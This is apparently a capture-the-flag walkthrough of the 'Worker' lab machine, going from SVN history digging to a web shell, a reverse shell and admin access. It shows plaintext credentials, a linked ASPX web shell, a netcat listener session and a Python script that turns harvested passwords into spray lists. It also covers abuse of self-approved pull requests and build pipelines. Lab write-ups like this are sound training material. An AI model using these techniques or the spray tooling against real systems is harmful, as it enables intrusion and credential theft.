NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating Ping Scan at 17:11
Scanning 10.10.10.203 [4 ports]
Completed Ping Scan at 17:11, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:11
Scanning alpha.worker.htb (10.10.10.203) [1000 ports]
Discovered open port 80/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed SYN Stealth Scan at 17:11, 25.11s elapsed (1000 total ports)
Initiating Service scan at 17:11
Scanning 2 services on alpha.worker.htb (10.10.10.203)
Completed Service scan at 17:11, 6.86s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against alpha.worker.htb (10.10.10.203)
Retrying OS detection (try #2) against alpha.worker.htb (10.10.10.203)
Initiating Traceroute at 17:11
Completed Traceroute at 17:11, 0.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 17:11
Completed Parallel DNS resolution of 2 hosts. at 17:11, 0.25s elapsed
NSE: Script scanning 10.10.10.203.
Initiating NSE at 17:11
Completed NSE at 17:11, 7.69s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 1.84s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Nmap scan report for alpha.worker.htb (10.10.10.203)
Host is up (0.43s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Alpha by HTML5 UP
3690/tcp open  svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   507.46 ms 10.10.14.1
2   507.71 ms alpha.worker.htb (10.10.10.203)

NSE: Script Post-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
           Raw packets sent: 2097 (95.952KB) | Rcvd: 49 (3.178KB)
PORT 80
Port 80 only serves the stock "Alpha by HTML5 UP" template on IIS 10.0; there is nothing to work with here.
SVN ENUMERATION
Port 3690 is svnserve (Subversion), so that is what we enumerate next.
Subversion is similar to git in that you check out, commit and push with a client, just with different commands; unlike git, the history lives only on the server and is addressed by revision number.
Start with a plain checkout of the repository:
┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn checkout svn://10.10.10.203
Restored 'dimension.worker.htb'
Restored 'dimension.worker.htb/images'
Restored 'dimension.worker.htb/images/pic03.jpg'
Restored 'dimension.worker.htb/images/overlay.png'
Restored 'dimension.worker.htb/images/bg.jpg'
<-------->
'dimension.worker.htb/assets/sass/libs/_breakpoints.scss'
Checked out revision 5.
The checkout gives us the latest revision (5): just a static site for dimension.worker.htb, so all we learn from it is a new subdomain.
Subversion keeps a single linear history numbered from r0 (the empty repository) through r1 (the first commit) up to HEAD, r5 here. A file deleted in a later commit is still present in every earlier revision, so check out older revisions with -r and compare:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #svn checkout -r 2 svn://10.10.10.203
A    deploy.ps1
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
<------>
Revision 2 contains files that are gone from the latest revision, deploy.ps1 among them, so let's read it:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
That is a credential hard-coded in a deployment script:
$user = "nathen"
$plain = "wendel98"
Piping a plaintext string into ConvertTo-SecureString does not protect it in any way (and without -AsPlainText -Force the cmdlet would actually reject it); either way the password sits in the repository history in clear text.
Another way to dig through the history is svn diff. Be aware that svn diff -r N compares revision N against the working copy, which is r5 here, so the output lists everything added or removed since N.
Against revision 1:
┌─[root@liquid]─[~/Desktop/HTB/worker] └──╼ #svn diff -r 1 Index: moved.txt =================================================================== --- moved.txt (nonexistent) +++ moved.txt (revision 5) @@ -0,0 +1,5 @@ +This repository has been migrated and will no longer be maintaned here. +You can find the latest version at: http://devops.worker.htb + +// The Worker team :) +
Against revision 2:
┌─[root@liquid]─[~/Desktop/HTB/worker] └──╼ #svn diff -r 2 Index: deploy.ps1 =================================================================== --- deploy.ps1 (revision 2) +++ deploy.ps1 (nonexistent) @@ -1,6 +0,0 @@ -$user = "nathen" -$plain = "wendel98" -$pwd = ($plain | ConvertTo-SecureString) -$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd -$args = "Copy-Site.ps1" -Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args") Index: moved.txt =================================================================== --- moved.txt (nonexistent) +++ moved.txt (revision 5) @@ -0,0 +1,5 @@ +This repository has been migrated and will no longer be maintaned here. +You can find the latest version at: http://devops.worker.htb + +// The Worker team :) +
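Review bot: the deploy.ps1 hunk removes a hard-coded plaintext credential ($user = "nathen", $plain = "wendel98") from the working copy only; every earlier revision still serves it to anyone who can read the repository, so the password has to be rotated rather than just deleted, and the replacement script should take the credential from a secret store or a Get-Credential prompt. As committed the script would not even run: ConvertTo-SecureString without -AsPlainText -Force expects an encrypted standard string and rejects plain text, which suggests it was never tested in this form. The moved.txt hunk is harmless in itself, though the migration notice hands the internal hostname devops.worker.htb to the same audience.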
Here deploy.ps1 shows up clearly as removed after revision 2, credential and all.
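Doing this by hand is fine for five revisions, but a repository with hundreds of commits wants a loop. The script below is an added example and not part of the original post: it lists revisions with svn log -q, diffs each one against its predecessor with svn diff -c N, and flags added or removed lines that look like credential assignments. The variable names in SECRET_RE are a starting list of my own, the file name svn_secrets.py is hypothetical, and the embedded SAMPLE_DIFF is a copy of the r2 diff above so the parser can be exercised without the box.

```python
#!/usr/bin/env python3
"""Walk every revision of a Subversion repository and flag added or removed
lines that look like credentials.

Added example for this walkthrough, not code from the original post.  The
parsing functions run offline on a constructed copy of the r2 diff from the
post; walk_repo() assumes an `svn` client on PATH and a reachable repository.
"""
import re
import subprocess
import sys

# Assignment-style secrets as they appear in deploy/build scripts.  The list of
# variable names is a hypothetical starting point; extend it per target.
SECRET_RE = re.compile(
    r"(?i)\b(user|username|password|passwd|pwd|plain|secret|token|api[_-]?key)\b\s*=\s*\S+"
)

# Constructed sample: the `svn diff -r 2` output shown in the post, i.e. the
# changes between revision 2 and the working copy at revision 5.
SAMPLE_DIFF = """\
Index: deploy.ps1
===================================================================
--- deploy.ps1\t(revision 2)
+++ deploy.ps1\t(nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen"
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Index: moved.txt
===================================================================
--- moved.txt\t(nonexistent)
+++ moved.txt\t(revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
"""


def parse_diff(diff_text):
    """Yield (path, sign, content) for every '+'/'-' line of an `svn diff`.

    The '--- path' / '+++ path' file headers are only expected right after the
    '====' separator, so a removed content line that happens to start with
    '--' is not mistaken for a header.
    """
    path = None
    headers_pending = 0
    for line in diff_text.splitlines():
        if line.startswith("Index: "):
            path = line[len("Index: "):].strip()
            headers_pending = 0
        elif line.startswith("====="):
            headers_pending = 2
        elif headers_pending and line[:4] in ("--- ", "+++ "):
            headers_pending -= 1
        elif line.startswith("@@") or path is None or not line:
            continue
        elif line[0] in "+-":
            yield path, line[0], line[1:]


def find_secrets(diff_text):
    """Return [(path, sign, line)] for changed lines that match SECRET_RE."""
    return [(p, s, c.strip()) for p, s, c in parse_diff(diff_text) if SECRET_RE.search(c)]


def svn(*args):
    """Run an svn subcommand and return its stdout (raises on failure)."""
    return subprocess.run(["svn", *args], check=True, capture_output=True, text=True).stdout


def revisions(repo_url):
    """Revision numbers from `svn log -q`, oldest first."""
    log = svn("log", "-q", repo_url)
    return sorted(int(m.group(1)) for m in re.finditer(r"^r(\d+) \|", log, re.M))


def walk_repo(repo_url):
    """Diff each revision against its predecessor (svn diff -c N) and collect hits."""
    hits = []
    for rev in revisions(repo_url):
        for path, sign, line in find_secrets(svn("diff", "-c", str(rev), repo_url)):
            hits.append((rev, path, sign, line))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:  # live repository, e.g. svn://10.10.10.203
        for rev, path, sign, line in walk_repo(sys.argv[1]):
            print(f"r{rev} {path} {sign} {line}")
    else:  # offline: scan the embedded sample
        for path, sign, line in find_secrets(SAMPLE_DIFF):
            print(f"{path} {sign} {line}")
```

Run it with the repository URL (python3 svn_secrets.py svn://10.10.10.203) to walk a live repository; without arguments it scans the embedded sample and prints the three deploy.ps1 lines. svn diff -c N against a URL needs no working copy, which keeps the loop cheap, and looking at removed lines is the point: a secret somebody cleaned up is still one commit away.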
Let's use those credentials to log in to devops.worker.htb, the host named in moved.txt.
DEVOPS.WORKER.HTB
nathen:wendel98
Logged in as nathen, we have access to a number of websites (repositories). The plan is to upload a web shell to one of them and trigger it by browsing to that site.
Since the target is IIS, the shell to upload is an ASPX one:
https://github.com/puckiestyle/aspx/blob/master/InsomniaShell.aspx
So let's upload it.
We cannot commit straight to master (the branch is protected), so the upload has to go through a branch and a pull request. The protection is only as strong as its policy, and here the same account that opens the pull request is allowed to approve it.
Click Branches and create a new one.
Open your branch and upload the shell into it.
Click the "create a pull request" option, then click Create.
Click Approve, then Complete (the two buttons sit side by side).
Complete the merge.
Done!
After a few seconds the site picks up the merged branch. Browse to the uploaded shell, start a listener, and use the web shell to spawn a reverse shell.
You land in something like this:
┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.203] 52441
Shell enroute.......
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>powershell.exe
powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>
Enumerating as the application-pool identity turns up nothing useful on C:, so list the other volumes:
PS C:\> Get-Volume
Get-Volume

DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining      Size
----------- ------------ -------------- --------- ------------ ----------------- -------------      ----
C                        NTFS           Fixed     Healthy      OK                      9.65 GB   29.4 GB
W           Work         NTFS           Fixed     Healthy      OK                     17.06 GB     20 GB
            Recovery     NTFS           Fixed     Healthy      OK                    118.04 MB    499 MB
The W: ("Work") volume is worth a look:
PS W:\> ls
ls

    Directory: W:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2020-06-16     18:59                agents
d-----        2020-03-28     14:57                AzureDevOpsData
d-----        2020-04-03     11:31                sites
d-----        2020-06-20     16:04                svnrepos

PS W:\> cd svnrepos
cd svnrepos
PS W:\svnrepos> ls
ls

    Directory: W:\svnrepos

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2020-06-20     11:29                www

PS W:\svnrepos> cd www
cd www
PS W:\svnrepos\www> ls

    Directory: W:\svnrepos\www

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2020-06-20     15:30                conf
d-----        2020-06-20     15:52                db
d-----        2020-06-20     11:29                hooks
d-----        2020-06-20     11:29                locks
-ar---        2020-06-20     11:29              2 format
-a----        2020-06-20     11:29            251 README.txt

PS W:\svnrepos\www> cd conf
cd conf
PS W:\svnrepos\www\conf> ls
ls

    Directory: W:\svnrepos\www\conf

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2020-06-20     11:29           1112 authz
-a----        2020-06-20     11:29            904 hooks-env.tmpl
-a----        2020-06-20     15:27           1031 passwd
-a----        2020-04-04     20:51           4454 svnserve.conf

PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
<----->
svnserve stores its passwords in clear text in conf/passwd, so this file hands us every SVN account on the box. We need one that is also a valid Windows login; robisl, a name we saw earlier, is in the list:
robisl = wolves11
Let's try it over WinRM with evil-winrm.
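Because the svnserve passwd file is plain text, every entry in it is immediately usable for spraying against WinRM, SMB or Azure DevOps. The script below is an added example rather than anything from the original post: it parses the [users] section into user/password pairs, keeps the duplicate nichin entries (a real file can carry the same user twice, and the standard library's configparser refuses such a file in its default strict mode), and emits a deduplicated spray list. SAMPLE_PASSWD is constructed from the entries visible in the post.

```python
#!/usr/bin/env python3
"""Turn an svnserve `conf/passwd` file into a credential list for spraying.

Added example for this walkthrough, not code from the original post.  The
sample below is constructed from the entries shown in the post.  svnserve keeps
every password in clear text, and the file may list the same user more than
once (nichin here), which the stdlib configparser rejects in strict mode.
"""
import configparser

SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robisl = wolves11
"""


def parse_svn_passwd(text):
    """Return [(user, password)] from the [users] section in file order,
    keeping duplicate users and passwords that themselves contain '='."""
    creds = []
    in_users = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # svn config comments start with '#'
            continue
        if line.startswith("[") and line.endswith("]"):
            in_users = line[1:-1].strip().lower() == "users"
            continue
        if in_users and "=" in line:
            user, password = line.split("=", 1)   # split on the first '=' only
            creds.append((user.strip(), password.strip()))
    return creds


def parse_with_configparser(text):
    """What the stdlib parser does with the same file: strict mode raises on the
    duplicate user, lenient mode silently keeps only the last password for it.
    Returns (name of the strict-mode error or None, lenient {user: password})."""
    strict = configparser.ConfigParser()          # strict=True is the default
    try:
        strict.read_string(text)
        strict_error = None
    except configparser.DuplicateOptionError as exc:
        strict_error = type(exc).__name__
    lenient = configparser.ConfigParser(strict=False)
    lenient.read_string(text)
    return strict_error, dict(lenient["users"])


def spray_lines(creds):
    """Deduplicated 'user:password' lines for a spraying tool, order preserved."""
    seen, out = set(), []
    for user, password in creds:
        if (user, password) not in seen:
            seen.add((user, password))
            out.append(f"{user}:{password}")
    return out


if __name__ == "__main__":
    print("\n".join(spray_lines(parse_svn_passwd(SAMPLE_PASSWD))))
```

Feed the output to whatever sprayer you use (a user/password file for crackmapexec, or a loop over evil-winrm). Keeping both nichin passwords is deliberate: an older password that was rotated in SVN may still be valid on another service, which is exactly the kind of reuse a lenient parser would hide.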
USER ACCESS
┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #evil-winrm -u robisl -p wolves11 -i 10.10.10.203

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls

    Directory: C:\Users\robisl\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         8/22/2020   7:39 AM             34 user.txt

*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
16dfdc02fa843b51362d885c28d53a6d
That's the user flag!
Now for Administrator.
ADMINISTRATOR ACCESS
Nothing in robisl's profile or elsewhere on the filesystem is readable that would help with privilege escalation, so take the credentials back to devops.worker.htb.
They work, but as robisl there is no repository to work with.
What robisl can do is create a pipeline. Pipelines execute on the self-hosted build agent installed on this machine (the W:\agents directory seen earlier), so every script step runs under the agent's own account. Let's create one.
Instructions To Follow
Create a new pipeline.
Click Azure Repos Git.
Click PartsUnlimited.
Scroll down to Starter pipeline and select it.
Delete everything in the editor and paste this:
steps:
- script: whoami /all
  displayName: 'Run a one-line script'
Save and run. Because master is protected, pick the option to commit to a new branch (any name will do) in the save dialog, then save and run again; the job log shows the output of whoami /all.
It shows that the agent runs with administrative privileges, so our pipeline step does too. Anyone who can create or edit a pipeline in this project therefore gets code execution as the agent account, which is why an agent should run as a dedicated low-privileged user and branch policies should require a reviewer other than the author.
Reading the root flag is then just another pipeline: repeat the steps above, but paste this step instead:
steps:
- script: type c:\Users\Administrator\Desktop\root.txt
  displayName: 'Run a one-line script'
Wait for the job to finish and the flag is in its log.
That's the root flag!!
HOPE YOU ENJOYED THIS WALKTHROUGH BY LIQUIDRAGE